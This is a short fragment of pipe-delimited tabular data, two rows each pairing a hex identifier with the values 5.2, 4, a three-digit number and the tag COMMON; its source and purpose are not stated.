068087D8 | 5.2 | | 4 | 168 | COMMON |
0680ACA3 | 5.2 | | 4 | 163 | COMMON |